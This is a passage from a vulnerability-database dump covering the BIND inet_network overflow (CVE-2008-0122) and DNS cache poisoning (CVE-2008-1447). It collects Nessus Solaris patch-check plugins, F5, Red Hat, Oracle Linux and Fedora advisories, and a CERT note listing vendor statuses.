patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:01:22", "description": "SunOS 5.8: libresolv.so.2, in.named and BI.\nDate this patch was last updated by Sun : Mar/09/09", "edition": 23, 
"published": "2004-07-12T00:00:00", "title": "Solaris 8 (sparc) : 109326-24", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2008-1447", "CVE-2007-2930", "CVE-2009-0696", "CVE-2008-4194"], "modified": "2004-07-12T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_109326.NASL", "href": "https://www.tenable.com/plugins/nessus/13321", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13321);\n script_version(\"1.55\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2930\", \"CVE-2008-0122\", \"CVE-2008-1447\", \"CVE-2008-4194\", \"CVE-2009-0696\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Solaris 8 (sparc) : 109326-24\");\n script_summary(english:\"Check for patch 109326-24\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 109326-24\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8: libresolv.so.2, in.named and BI.\nDate this patch was last updated by Sun : Mar/09/09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/109326-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16, 189, 399);\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/12\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcstlx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWarcx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcslx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif 
(solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109326-24\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-09-01T23:49:39", "description": "SunOS 5.10: libc.so.1.9 patch.\nDate this patch was last updated by Sun : Jun/06/08", "edition": 5, "published": "2008-06-18T00:00:00", "title": "Solaris 10 (sparc) : 136892-01", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122"], "modified": "2018-08-13T00:00:00", "cpe": [], "id": "SOLARIS10_136892.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33205", "sourceData": "\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(33205);\n script_version(\"1.14\");\n\n script_name(english: \"Solaris 10 (sparc) : 136892-01\");\n script_cve_id(\"CVE-2008-0122\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 136892-01\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10: libc.so.1.9 patch.\nDate this patch was last updated by Sun : Jun/06/08');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/136892-01\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/06/18\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 136892-01\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2016-09-26T17:23:01", "bulletinFamily": "software", "cvelist": ["CVE-2008-0122"], "edition": 1, "description": "An off-by-one error in the **inet_network()** function in **libbind** could lead to memory corruption with certain inputs. **libbind** has a vulnerability in the **inet_network** API. 
However, this API is not used by any F5 products that use the affected version of BIND.\n\nInformation about this advisory is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0122>\n\nF5 Product Development is tracking this issue as CR92595.\n", "modified": "2013-03-19T00:00:00", "published": "2008-04-23T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/500/sol8578.html", "id": "SOL8578", "title": "SOL8578 - Security Advisory: BIND buffer overflow in inet_network CVE-2008-0122", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:22:51", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "edition": 1, "description": "This security advisory describes a BIND 8 and BIND 9 vulnerability which allows remote attackers to spoof DNS traffic using cache poisoning techniques against recursive resolvers. With the exception of FirePass, the F5 products listed as **affected** in this security advisory run a version of BIND that is affected by this vulnerability. Although FirePass does not run the BIND software, its local DNS resolver client is vulnerable to DNS cache poisoning techniques described in CVE-2008-1447 and VU#800113.\n\nInformation about this advisory is available at the following locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447>\n\n<http://www.kb.cert.org/vuls/id/800113>\n\nF5 Product Development tracked this issue as CR99135 for BIG-IP LTM, GTM, ASM, WebAccelerator and PSM and it was fixed in versions 9.4.6 and 10.0.0. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, PSM, and WebAccelerator release notes.\n\nThis issue was also fixed in Enterprise Manager version 1.7.0. 
For information about upgrading, refer to the Enterprise Manager release notes.\n\nF5 Product Development tracked this issue as CR99135 for the BIG-IP LTM 9.6 software branch.\n\nAdditionally, this issue was fixed in hotfix versions BIG-IP-9.3.1-HF4, BIG-IP-9.4.4-HF3, BIG-IP-9.4.5-HF2, and BIG-IP-9.6.1-HF2. You may download these hotfixes or later versions of the hotfixes from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nTo view a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nF5 Product Development tracked this issue as CR102424 and it was fixed in FirePass 6.0.3. For information about upgrading, refer to the [FirePass](<https://support.f5.com/kb/en-us/products/firepass.html>) release notes.\n\nThis issue still exists in the FirePass 5.x branch.\n\n**Obtaining and installing patches**\n\nYou can download patches from the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for the following products and versions:\n\n**Important**: If you installed Hotfix-102424, you must remove Hotfix-102424 before upgrading to FirePass version 6.0.2 or an earlier version of FirePass software. Failure to remove Hotfix-102424 prior to an upgrade may result in the FirePass Administrative Console and logon page becoming inaccessible after the upgrade. 
You can safely upgrade to FirePass version 6.0.3 after installing Hotfix-102424.\n\nProduct | Version | Hotfix | Installation File \n---|---|---|--- \nFirePass | 6.0.2 | Hotfix-102424 | HF-102424-1-6.02-ALL-0.tar.gz.enc \nFirePass | 6.0.1 | Hotfix-102424 | HF-102424-1-6.01-ALL-0.tar.gz.enc \nFirePass | 5.5.2 | Hotfix-102424 | HF-102424-1-5.52-ALL-0.tar.gz.enc \nFirePass | 5.5.1 | Hotfix-102424 | HF-102424-1-5.51-ALL-0.tar.gz.enc \nFirePass | 5.5.0 | Hotfix-102424 | HF-102424-1-5.5-ALL-0.tar.gz.enc \n \n**Note**: For more information about installing the hotfixes listed above, refer to the readme file on the F5 [Downloads](<https://downloads.f5.com/esd/index.jsp>) site for your version-specific hotfix.\n\nFor information about downloading software, refer to SOL167: Downloading software from F5.\n\n**Workaround**\n\nIf you enabled DNS recursion in BIND on an F5 product (excluding FirePass), you can work around this issue by disabling DNS recursion. For information about enabling and disabling DNS recursion in BIND, refer to the BIND documentation at default <http://www.isc.org/products/BIND/>.\n\n**Important**: The BIND vulnerability is only exploitable if recursion has been enabled in BIND. F5 LTM 9.x, GTM 9.x, ASM 9.x, Link Controller 9.x, WebAccelerator 9.x, PSM, Firepass 5.x and 6.x, and Enterprise Manager 1.x products do not enable recursion by default, with the exception of the BIG-IP LTM MSM module configured for **local bind**.\n\nTo minimize the risk for FirePass platforms, configure FirePass to use a local, secure name server for DNS resolution. 
Additionally, implement anti-spoofing mechanisms on your DNS servers and/or network firewalls.\n\n**Note**: You can configure the name servers in the FirePass Administrative Console on the Device Management > Configuration > Network Configuration page under the **DNS** tab.\n", "modified": "2013-03-19T00:00:00", "published": "2008-07-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/900/sol8938.html", "id": "SOL8938", "type": "f5", "title": "SOL8938 - BIND DNS cache poisoning vulnerability - CVE-2008-1447 - VU#800113", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:56", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "description": "[30:9.3.4-6.P1]\n- final 5.2 version\n- minor changes in initscript\n - improved patches for #250744 and #250901\n[30:9.3.4-5.P1]\n- improved patch to handle D-BUS races (#240876)\n- updated named.root zone to affect root IPv6 migration\n[30:9.3.4-4.P1]\n- improved fix for #253537, posttrans script is now used\n- do not call restorecon on chroot/proc\n[30:9.3.4-3.P1]\n- CVE-2008-0122 (small buffer overflow in inet_network)\n[30:9.3.4-2.P1]\n- ship /usr/include/dst/gssapi.h file\n[30:9.3.4-1.P1]\n- CVE-2007-6283 (#419421)\n[30:9.3.4-0.9.2.P1]\n- added GSS-TSIG support to nsupdate (#251528)\n[30:9.3.4-0.9.1.P1]\n- updated L.ROOT-SERVERS.NET address in lib/dns/rootns.c file\n[30:9.3.4-0.9.P1]\n- fixed building of SDB stuff (#240788)\n- fixed race condition during DBUS initialization (#240876)\n- initscript LSD standardization (#242734)\n[command (#247148)]\n- fixed wrong perms of named's ldap schema (#250118)\n- supressed errors from chroot's specfile scripts (#252334)\n- fixed /dev/random SELinux labelling\n- added configtest to usage report from named initscript (#250744)\n- fixed rndc stop return value handler (#250901)\n- fixed named.log sync in bind-chroot-admin (#247486)\n- rebased to latest 9.3 
maintenance release (9.3.4-P1, #353741)\n- updated named.root file (new L.ROOT-SERVERS.NET, #363531)\n- added GSS-TSIG support to named (#251528)\n - dropped patches (upstream)\n - bind-9.3.4.P1-query-id.patch\n - bind-9.3.3rc2-dbus-0.6.patch\n - bind-9.3.4-validator.patch\n - bind-9.3.4-nqueries.patch\n - updated patches\n - bind-9.3.2-tmpfile.patch", "edition": 4, "modified": "2008-05-30T00:00:00", "published": "2008-05-30T00:00:00", "id": "ELSA-2008-0300", "href": "http://linux.oracle.com/errata/ELSA-2008-0300.html", "title": "bind security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:22", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6283", "CVE-2008-0122"], "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\r\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\r\nlibrary (routines for applications to use when interfacing with DNS); and\r\ntools for verifying that the DNS server is operating correctly.\r\n\r\nIt was discovered that the bind packages created the \"rndc.key\" file with\r\ninsecure file permissions. This allowed any local user to read the content\r\nof this file. A local user could use this flaw to control some aspects of\r\nthe named daemon by using the rndc utility, for example, stopping the named\r\ndaemon. This problem did not affect systems with the bind-chroot package\r\ninstalled. (CVE-2007-6283)\r\n\r\nA buffer overflow flaw was discovered in the \"inet_network()\" function, as\r\nimplemented by libbind. An attacker could use this flaw to crash an\r\napplication calling this function, with an argument provided from an\r\nuntrusted source. 
(CVE-2008-0122)\r\n\r\nAs well, these updated packages fix the following bugs:\r\n\r\n* when using an LDAP backend, missing function declarations caused\r\nsegmentation faults, due to stripped pointers on machines where pointers\r\nare longer than integers.\r\n\r\n* starting named may have resulted in named crashing, due to a race\r\ncondition during D-BUS connection initialization. This has been resolved in\r\nthese updated packages.\r\n\r\n* the named init script returned incorrect error codes, causing the\r\n\"status\" command to return an incorrect status. In these updated packages,\r\nthe named init script is Linux Standard Base (LSB) compliant.\r\n\r\n* in these updated packages, the \"rndc [command] [zone]\" command, where\r\n[command] is an rndc command, and [zone] is the specified zone, will find\r\nthe [zone] if the zone is unique to all views.\r\n\r\n* the default named log rotation script did not work correctly when using\r\nthe bind-chroot package. In these updated packages, installing\r\nbind-chroot creates the symbolic link \"/var/log/named.log\", which points\r\nto \"/var/named/chroot/var/log/named.log\", which resolves this issue.\r\n\r\n* a previous bind update incorrectly changed the permissions on the\r\n\"/etc/openldap/schema/dnszone.schema\" file to mode 640, instead of mode\r\n644, which resulted in OpenLDAP not being able to start. In these updated\r\npackages, the permissions are correctly set to mode 644.\r\n\r\n* the \"checkconfig\" parameter was missing in the named usage report. For\r\nexample, running the \"service named\" command did not return \"checkconfig\"\r\nin the list of available options.\r\n\r\n* due to a bug in the named init script not handling the rndc return value\r\ncorrectly, the \"service named stop\" and \"service named restart\" commands\r\nfailed on certain systems.\r\n\r\n* the bind-chroot spec file printed errors when running the \"%pre\" and\r\n\"%post\" sections. 
Errors such as the following occurred:\r\n\r\nLocating //etc/named.conf failed:\r\n[FAILED]\r\n\r\nThis has been resolved in these updated packages.\r\n\r\n* installing the bind-chroot package creates a \"/dev/random\" file in the\r\nchroot environment; however, the \"/dev/random\" file had an incorrect\r\nSELinux label. Starting named resulted in an 'avc: denied { getattr } for\r\npid=[pid] comm=\"named\" path=\"/dev/random\"' error being logged. The\r\n\"/dev/random\" file has the correct SELinux label in these updated packages.\r\n\r\n* in certain situations, running the \"bind +trace\" command resulted in\r\nrandom segmentation faults.\r\n\r\nAs well, these updated packages add the following enhancements:\r\n\r\n* support has been added for GSS-TSIG (RFC 3645).\r\n\r\n* the \"named.root\" file has been updated to reflect the new address for\r\nL.ROOT-SERVERS.NET.\r\n\r\n* updates BIND to the latest 9.3 maintenance release.\r\n\r\nAll users of bind are advised to upgrade to these updated packages, which\r\nresolve these issues and add these enhancements.", "modified": "2017-09-08T11:59:35", "published": "2008-05-20T04:00:00", "id": "RHSA-2008:0300", "href": "https://access.redhat.com/errata/RHSA-2008:0300", "type": "redhat", "title": "(RHSA-2008:0300) Moderate: bind security, bug fix, and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is lightweight DNS forwarder and DHCP server. It is designed to\nprovide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have made\nDNS spoofing attacks easier. dnsmasq has been updated to use random UDP\nsource ports, helping to make DNS spoofing attacks harder. 
(CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "modified": "2017-09-08T12:13:40", "published": "2008-08-11T04:00:00", "id": "RHSA-2008:0789", "href": "https://access.redhat.com/errata/RHSA-2008:0789", "type": "redhat", "title": "(RHSA-2008:0789) Moderate: dnsmasq security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6283", "CVE-2008-0122"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2008-01-22T16:01:26", "published": "2008-01-22T16:01:26", "id": "FEDORA:M0MG2IGR000424", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: bind-9.5.0-23.b1.fc8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2241", "CVE-2007-2925", "CVE-2007-2926", "CVE-2007-6283", "CVE-2008-0122"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. 
", "modified": "2008-01-22T16:01:40", "published": "2008-01-22T16:01:40", "id": "FEDORA:M0MG2IGT000424", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: bind-9.4.2-3.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6283"], "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "modified": "2007-12-20T19:49:29", "published": "2007-12-20T19:49:29", "id": "FEDORA:LBKJNVQ8025472", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: bind-9.5.0-20.b1.fc8", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is lightweight, easy to configure DNS forwarder and DHCP server. It is designed to provide DNS and, optionally, DHCP, to a small network. It can serve the names of local machines which are not in the global DNS. The DHCP server integrates with the DNS server and allows machines with DHCP-allocated addresses to appear in the DNS with names configured either in each host or in a central configuration file. Dnsmasq supports static and dynamic DHCP leases and BOOTP for network booting of diskless machines. 
", "modified": "2009-02-14T22:11:22", "published": "2009-02-14T22:11:22", "id": "FEDORA:EB89E20852E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: dnsmasq-2.45-1.fc9", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "cert": [{"lastseen": "2020-09-18T20:42:37", "bulletinFamily": "info", "cvelist": ["CVE-2008-0122"], "description": "### Overview \n\nThe` inet_network()` resolver function contains an off-by-one buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe `inet_network()` function takes a character string representation for an internet address and returns the internet network number in integer form. `inet_network()` is implemented by various libbind, libc, and [GNU libc](<http://www.gnu.org/software/libc/>) versions. Applications that link against a vulnerable version of `inet_network()` may be vulnerable to a one-byte overflow. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code or cause a denial of service on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update**\n\n**FreeBSD libc** \\- Apply the patch in FreeBSD Security Advisory [FreeBSD-SA-08:02.libc](<http://security.freebsd.org/advisories/FreeBSD-SA-08:02.libc.asc>) \n**GNU libc** \\- This issue was resolved on February 11, 2000 in the main ([diff](<http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.8&r2=1.9&cvsroot=glibc&f=h>)) and glibc 2.1 ([diff](<http://sourceware.org/cgi-bin/cvsweb.cgi/libc/inet/inet_net.c.diff?r1=1.6.2.1&r2=1.6.2.2&cvsroot=glibc&f=h>)) branches \n**libbind** \\- This issue will be resolved in libbind 9.3.5, 9.4.3, 2.5.0b2, or later. 
A patch is also available in the ISC [Advisory](<http://www.isc.org/sw/bind/bind-security.php>) \n \n--- \n \n### Vendor Information\n\n### FreeBSD, Inc. __ Affected\n\nNotified: January 17, 2008 Updated: January 25, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nApply the patch in FreeBSD Security Advisory [FreeBSD-SA-08:02.libc](<http://security.freebsd.org/advisories/FreeBSD-SA-08:02.libc.asc>)\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23203611 Feedback>).\n\n### GNU glibc __ Affected\n\nNotified: January 17, 2008 Updated: January 25, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe GNU C library is not vulnerable. Ulrich Drepper contributed a fix for that bug on 2000-02-11, shortly after importing the code from BIND 8.2.2.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD __ Affected\n\nNotified: January 17, 2008 Updated: January 21, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nlibbind is available in the OpenBSD ports repository.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23203611 Feedback>).\n\n### Apple Computer, Inc. 
__ Not Affected\n\nNotified: January 17, 2008 Updated: January 25, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe issue described in CVE-2008-0122 does not affect Apple products.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### BlueCat Networks, Inc. Not Affected\n\nNotified: January 17, 2008 Updated: April 28, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company __ Not Affected\n\nNotified: January 17, 2008 Updated: January 31, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nRegarding the ISC report concerning a vulnerability in libbind: \nThe function inet_network() contains a 1-byte overflow. However, \nHP is not affected by this 1-byte overflow in inet_network(), because our \ninet_network() API implementation in HP-UX (B.11.11, B.11.23, B.11.31) is \ndifferent than other operating systems.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Infoblox __ Not Affected\n\nNotified: January 17, 2008 Updated: January 31, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have evaluated our exposure to exploit #VU203611 (CVE-2008-0122) and have determined we are not vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. __ Not Affected\n\nNotified: January 17, 2008 Updated: January 29, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nIngrian networks products are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Mandriva, Inc. 
__ Not Affected\n\nNotified: January 17, 2008 Updated: January 21, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMandriva does not provide libbind, and no applications are linked against it therefore Mandriva is not vulnerable to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Microsoft Corporation Not Affected\n\nNotified: January 17, 2008 Updated: January 18, 2008 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### CentOS Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. 
Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Debian GNU/Linux __ Unknown\n\nNotified: January 17, 2008 Updated: January 21, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nTo our knowledge, this vulnerability has already been fixed in the GNU libc resolver in 2000; no current Debian release is affected as a result. \n \nThe bind-dev package contains a copy of the vulnerable BIND 8 code, but it is not used by Debian.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: January 17, 2008 Updated: January 17, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure 